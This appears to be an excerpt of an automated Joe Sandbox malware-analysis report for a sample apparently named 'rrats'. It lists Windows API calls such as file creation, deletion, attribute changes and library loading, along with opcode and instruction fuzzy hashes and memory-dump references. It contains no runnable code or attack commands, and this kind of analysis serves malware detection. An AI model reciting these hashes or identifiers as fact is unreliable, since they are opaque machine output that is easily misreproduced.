                                                              • Opcode Fuzzy Hash: 6dca8e7239a7c81993cfe4a33acc5279718348e3f153fb8b37b06952a76f5777
                                                              • Instruction Fuzzy Hash: 4421D2312492469BC714CF34C492AABBBE4EF56308F08491DF4D587151D339EA4C9B62
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CA9F27,?,?,00CA771A), ref: 00CA96E6
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CA9F27,?,?,00CA771A), ref: 00CA9716
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: f2447513e94661ea6b15516d194e6ef03063c4e61daab4a69ac431dda3fd9bdd
                                                              • Instruction ID: fde1b36afc92f7dc3b0b0c2c5d51ba37b2c696322a7d52a0fe8018eaa8bb42d4
                                                              • Opcode Fuzzy Hash: f2447513e94661ea6b15516d194e6ef03063c4e61daab4a69ac431dda3fd9bdd
                                                              • Instruction Fuzzy Hash: E021CFB11007456FE3708A65CC8ABE7B7DCEF4A328F100A19FAA6C61D1C774A9849631
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CA9EC7
                                                              • GetLastError.KERNEL32 ref: 00CA9ED4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 3079eba4a550e81371bad2d1c3e086984c46d0c9071644d94481ae5038256e44
                                                              • Instruction ID: eb3217e0c59380d224cdc218d4cd61a8ccb525f830594c7ce9713221139e3357
                                                              • Opcode Fuzzy Hash: 3079eba4a550e81371bad2d1c3e086984c46d0c9071644d94481ae5038256e44
                                                              • Instruction Fuzzy Hash: B311E570600706ABD724C629CC42BA6B7E8EB46364F544A29E563D26D1D770EE45C760
                                                              APIs
                                                              • _free.LIBCMT ref: 00CC8E75
                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00CE1098,00CA17CE,?,?,00000007,?,?,?,00CA13D6,?,00000000), ref: 00CC8EB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: a8b744473fde5bc5433a219189c93fdfe4da232df3c26d20875711fdda9ffacf
                                                              • Instruction ID: 29a2eed75e1b94908cb53bde9ce9d2ea9c217d5b8a8575170bfb803c8c5ff984
                                                              • Opcode Fuzzy Hash: a8b744473fde5bc5433a219189c93fdfe4da232df3c26d20875711fdda9ffacf
                                                              • Instruction Fuzzy Hash: C5F0213A60110566CB212A2ADC05FAF375CCFC2770F55012DF82497191DF71CE04A1A0
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00CB10AB
                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CB10B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: 253f64a2752f3694e8c7e7debffe9e71f6738264fdf63d993fd0895d07630e4d
                                                              • Instruction ID: 83b3ca13fdfddc602e8bf99415219872a3d5de13031281507f68c0836879ca68
                                                              • Opcode Fuzzy Hash: 253f64a2752f3694e8c7e7debffe9e71f6738264fdf63d993fd0895d07630e4d
                                                              • Instruction Fuzzy Hash: 03E0D832B10185A7CF0997B4AC15AEF73EDEA44204B188176EC13D3101F934EF414760
                                                              APIs
                                                              • LoadStringW.USER32(00CA13B6,?,00CE1098,00CA13B6), ref: 00CAE678
                                                              • LoadStringW.USER32(00CA13B6,?,00CE1098), ref: 00CAE68F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: LoadString
                                                              • String ID:
                                                              • API String ID: 2948472770-0
                                                              • Opcode ID: 2ef9645bf2284300d1a51cd18da3014fbb2a301dda0bf00bd916d93341ba821d
                                                              • Instruction ID: b997df481fc70d0263bf256c87dc4e5fcd263012c0ccbe6036a5f2744567053b
                                                              • Opcode Fuzzy Hash: 2ef9645bf2284300d1a51cd18da3014fbb2a301dda0bf00bd916d93341ba821d
                                                              • Instruction Fuzzy Hash: F5F0F876100299BBCF111FA1EC04EAF7F69EF1A3947048415FE188A220D6328970EBE0
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 700f7bc483269ef9f32f540b0b5bc078b69e8c904031551d6366052646a86bd6
                                                              • Instruction ID: a1177e5b6625da57317e09edb4fdffd53282b339027e8cff585b328b6f7f4563
                                                              • Opcode Fuzzy Hash: 700f7bc483269ef9f32f540b0b5bc078b69e8c904031551d6366052646a86bd6
                                                              • Instruction Fuzzy Hash: 22F0393224024ABBDF015F60DC45FDE3BACAB05789F888062B949D6160DB71DF98EA65
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641,000000FF), ref: 00CAA1F1
                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641), ref: 00CAA21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: b2a5138ddf844dfc5315a2162918383e67322da012c5012d1a172bc7e58f5643
                                                              • Instruction ID: e511136b5bcd46315caf47c1acdd58d5ad91512591086a619ce92fbe6bcfdd86
                                                              • Opcode Fuzzy Hash: b2a5138ddf844dfc5315a2162918383e67322da012c5012d1a172bc7e58f5643
                                                              • Instruction Fuzzy Hash: 89E0923514020A6BDB015F60DC45FDE379CAB09785F484021B949D2050EB61DE98EA65
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00CD2641,000000FF), ref: 00CBACB0
                                                              • CoUninitialize.COMBASE(?,?,?,?,00CD2641,000000FF), ref: 00CBACB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: a1b6a0b5997c2d4f86e5c5a6a13338ab6d83040b2d605e96ef50362f111b2808
                                                              • Instruction ID: a98ae74203f2d5aaeb2b85cbbd162b6231aa8e0db11f5a89e04075cb85cffeeb
                                                              • Opcode Fuzzy Hash: a1b6a0b5997c2d4f86e5c5a6a13338ab6d83040b2d605e96ef50362f111b2808
                                                              • Instruction Fuzzy Hash: 49E06572504650EFC7009B58DC46B49FBACFB88B20F00426AF416D37A0CB74A801CA95
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00CAA23A,?,00CA755C,?,?,?,?), ref: 00CAA254
                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CAA23A,?,00CA755C,?,?,?,?), ref: 00CAA280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 261d46f67ce0f21cba8bf5ce5cabd0bec294324c092a14e24b285c243a26797e
                                                              • Instruction ID: f86576aa38e3041fee3fa81fe1ae213f610e785259a7b0c37ba6c094237f844f
                                                              • Opcode Fuzzy Hash: 261d46f67ce0f21cba8bf5ce5cabd0bec294324c092a14e24b285c243a26797e
                                                              • Instruction Fuzzy Hash: 76E092315001245BCB50AB64DC09BE97B98AB0D3E5F044261FD59E3190D770DE44CAA1
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00CBDEEC
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00CBDF03
                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046A,?), ref: 00CBB59E
                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 1610d030a23cc808b109370afcf15c2246594188c2cfabb45a92c841476a5f31
                                                              • Instruction ID: 491766edba2a3d1c4d00e06ccb89996b0b0ba846c22dfaae2acf46582c249073
                                                              • Opcode Fuzzy Hash: 1610d030a23cc808b109370afcf15c2246594188c2cfabb45a92c841476a5f31
                                                              • Instruction Fuzzy Hash: BAE0D8B240038D2ADF02AB60DC07FDE3BAC9B05789F040851B205EB0F3DA78EA14A771
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: d884e75d5a783cccfc8f7189b8d786a28d50963914016e3b8b07e73dba185825
                                                              • Instruction ID: 7de1448d144bc4672e2e2cd13836fd5492be9851b478ab42395583664c9046ab
                                                              • Opcode Fuzzy Hash: d884e75d5a783cccfc8f7189b8d786a28d50963914016e3b8b07e73dba185825
                                                              • Instruction Fuzzy Hash: D0E04F768011686BDB11ABA4DC49FDB7BACFF097D1F040066B649E2044DA74EF84CBB0
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CBA3DA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CBA3E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: 5547c8ef3c87d8783d9156778135fec0879bd5ae3c9f9917d889cc4dc0b1ef46
                                                              • Instruction ID: f84a387e1cfec4a92455aa0481fdf45e12910402f0e5a2bd0425e8469ff496ad
                                                              • Opcode Fuzzy Hash: 5547c8ef3c87d8783d9156778135fec0879bd5ae3c9f9917d889cc4dc0b1ef46
                                                              • Instruction Fuzzy Hash: 15E0ED71500218EBCB10DF55C5416D9BBE8EF04760F10805AA99693211E374AE44DBA1
                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC2BAA
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CC2BB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: 378f96bd0d964ee3a7223b8ccf5ba6cd78930245e9a872515626fc50e8f69641
                                                              • Instruction ID: c7455d5be9e04bfba86586052cbafc87900aa3627f069572d09c9cbc4fccbe21
                                                              • Opcode Fuzzy Hash: 378f96bd0d964ee3a7223b8ccf5ba6cd78930245e9a872515626fc50e8f69641
                                                              • Instruction Fuzzy Hash: 0FD022341643009A8C147E75F82BF5D3385AD41B70BA083DEF033894C1EE1099C0B021
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: 36875bbd1d41359cb48bd6d6f47aa791c3bc1843f111ef685cf25e78da402bd5
                                                              • Instruction ID: c239820125071563d5b0fb2beadc8dd3405bb22c2b4d20d196b34534715283a4
                                                              • Opcode Fuzzy Hash: 36875bbd1d41359cb48bd6d6f47aa791c3bc1843f111ef685cf25e78da402bd5
                                                              • Instruction Fuzzy Hash: 19C0123205C300BECB010BB4DC09E2BBBACABA9312F04C90CB0A9C0260C238C120DB62
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00CA12E1
                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00CA12E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherItemUser
                                                              • String ID:
                                                              • API String ID: 4250310104-0
                                                              • Opcode ID: faa60721a992c0b10927e51ebe193e5afcf9d23820ef9fd4b03f29b4b344dc32
                                                              • Instruction ID: fcb29f8f3c9ff7aafbf5272f273a514b75e544f3651fd474ca12207aa77eb708
                                                              • Opcode Fuzzy Hash: faa60721a992c0b10927e51ebe193e5afcf9d23820ef9fd4b03f29b4b344dc32
                                                              • Instruction Fuzzy Hash: 33C00276408340BECB015BA09C0892BBBA9AB99311B04C809B1A9C0220C6358520DB22
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 06f589250ea5cd0b4b557afc9cf1ca550cb546139e579e3163468bf61aa8c346
                                                              • Instruction ID: 8cb0917ee35e81019c97e0b45078d89fc6d4bb154380658aa573dedea478b2ee
                                                              • Opcode Fuzzy Hash: 06f589250ea5cd0b4b557afc9cf1ca550cb546139e579e3163468bf61aa8c346
                                                              • Instruction Fuzzy Hash: 95C1B270A002569FEF15DF68C498BAD7BA5AF16318F0C01BAEC559F392DB309A44CB61
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 0256b303a4e6d9c0beff14f4261af1548223997c56012ab4d2b8ae1655494651
                                                              • Instruction ID: 60fe286bca3253e9f081afe30bd0c40e12f8b656a512a398412c86309ded017b
                                                              • Opcode Fuzzy Hash: 0256b303a4e6d9c0beff14f4261af1548223997c56012ab4d2b8ae1655494651
                                                              • Instruction Fuzzy Hash: C371E371500B869ECB35DB70CC659E7B7E9AF16308F40092EF5AB87241DA326A84DF11
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA8289
                                                                • Part of subcall function 00CA13DC: __EH_prolog.LIBCMT ref: 00CA13E1
                                                                • Part of subcall function 00CAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$CloseFind
                                                              • String ID:
                                                              • API String ID: 2506663941-0
                                                              • Opcode ID: ed78d59c1bad5442aca094409eec97ae0a1d768379d413f4cc84c72b54b1d47a
                                                              • Instruction ID: f2149ea4ffa1f45331ee09f66ef75a1c66fa2eb9167eda1bdd9c3b2fc1859960
                                                              • Opcode Fuzzy Hash: ed78d59c1bad5442aca094409eec97ae0a1d768379d413f4cc84c72b54b1d47a
                                                              • Instruction Fuzzy Hash: BB41D97194465A9BDF20DBA0CC55BEAB7B8AF05308F4404EBE59A97093EB705FC8DB10
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA13E1
                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                • Part of subcall function 00CACE40: __EH_prolog.LIBCMT ref: 00CACE45
                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 1b5e8fee8dd210be994fb1259bdad8dc7de02b03f3c1f017d35dbe54f0d59fbf
                                                              • Instruction ID: fbde5d6e3b03f00f26118e1160291529480a6ec351ab9a8ee8adb268dd89c61c
                                                              • Opcode Fuzzy Hash: 1b5e8fee8dd210be994fb1259bdad8dc7de02b03f3c1f017d35dbe54f0d59fbf
                                                              • Instruction Fuzzy Hash: 054147B0905B419EE724CF798885AE6FBE5BF19304F54492EE5FE83282CB316654DB10
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA13E1
                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                • Part of subcall function 00CACE40: __EH_prolog.LIBCMT ref: 00CACE45
                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 2efb44216400c9672d5ad5f3987943baf1283b97276c84d418fffecc37ad0f23
                                                              • Instruction ID: 5574314b0bf98540ad5c99fa6bb88a3bb48103ee7335f4a1cb3b001bac8be482
                                                              • Opcode Fuzzy Hash: 2efb44216400c9672d5ad5f3987943baf1283b97276c84d418fffecc37ad0f23
